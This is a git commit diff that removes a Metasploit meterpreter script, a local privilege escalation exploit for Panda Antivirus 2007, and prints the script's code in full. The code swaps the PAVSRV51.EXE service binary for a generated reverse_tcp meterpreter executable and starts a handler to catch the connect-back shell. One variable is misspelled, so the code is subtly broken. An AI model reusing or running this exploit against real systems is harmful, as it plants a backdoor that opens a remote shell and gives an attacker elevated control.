Remove scripts/meterpreter/panda_2007_pavsrv51.rb
This commit is contained in:
parent
c9fb0950d9
commit
1734042e64
|
@ -1,115 +0,0 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# https://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
||||
# If you'd like to improve this script, please try to port it as a post
|
||||
# module instead. Thank you.
|
||||
##
|
||||
|
||||
|
||||
|
||||
##
|
||||
# Panda Antivirus 2007 Local Privilege Escalation
|
||||
# This module exploits a privilege escalation vulnerability in
|
||||
# Panda Antivirus 2007. Due to insecure permission issues, a
|
||||
# local attacker can gain elevated privileges.
|
||||
#
|
||||
# This script has only been tested against Panda Antivirus 2007.
|
||||
#
|
||||
# BID - 4257
|
||||
# mc[@]metasploit.com
|
||||
##
|
||||
|
||||
#
|
||||
# Options
|
||||
#
|
||||
@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "This help menu"],
|
||||
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
|
||||
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
|
||||
)
|
||||
|
||||
#
|
||||
# Default parameters
|
||||
#
|
||||
rhost = nil
|
||||
rport = nil
|
||||
|
||||
def usage
|
||||
print_status("Panda Antivirus 2007 Privilege Escalation.")
|
||||
print_line(@exec_opts.usage)
|
||||
raise Rex::Script::Completed
|
||||
end
|
||||
|
||||
#
|
||||
# Option parsing
|
||||
#
|
||||
@exec_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when "-r"
|
||||
rhost = val
|
||||
when "-p"
|
||||
rport = val.to_i
|
||||
else
|
||||
usage
|
||||
end
|
||||
end
|
||||
|
||||
if rhost.nil? or rport.nil?
|
||||
usage
|
||||
elsif client.platform == 'windows'
|
||||
client.sys.process.get_processes().each do |m|
|
||||
|
||||
if ( m['name'] =~ /PAVSRV51\.EXE/ )
|
||||
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
||||
|
||||
# Build out the exe payload.
|
||||
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
||||
pay.datastore['LHOST'] = rhost
|
||||
pay.datastore['LPORT'] = rport
|
||||
raw = pay.generate
|
||||
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Change to our working directory.
|
||||
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
|
||||
client.fs.dir.chdir(workindir)
|
||||
|
||||
# Create a backup of the original exe.
|
||||
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
|
||||
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
|
||||
|
||||
# Place our newly created exe with the orginal binary name.
|
||||
tempexe = workingdir + "PAVSRV51.EXE"
|
||||
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
fd.write(exe)
|
||||
fd.close
|
||||
|
||||
print_status("Done, now just wait for the callback...")
|
||||
|
||||
# Our handler to recieve the callback.
|
||||
handler = client.framework.exploits.create("multi/handler")
|
||||
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
|
||||
handler.datastore['LHOST'] = rhost
|
||||
handler.datastore['LPORT'] = rport
|
||||
# Keep our shell stable.
|
||||
handler.datastore['InitialAutoRunScript'] = "migrate -f"
|
||||
handler.datastore['ExitOnSession'] = false
|
||||
|
||||
handler.exploit_simple(
|
||||
'Payload' => handler.datastore['PAYLOAD'],
|
||||
'RunAsJob' => true
|
||||
)
|
||||
end
|
||||
end
|
||||
else
|
||||
print_error("This version of Meterpreter is not supported with this script!")
|
||||
raise Rex::Script::Completed
|
||||
end
|
Loading…
Reference in New Issue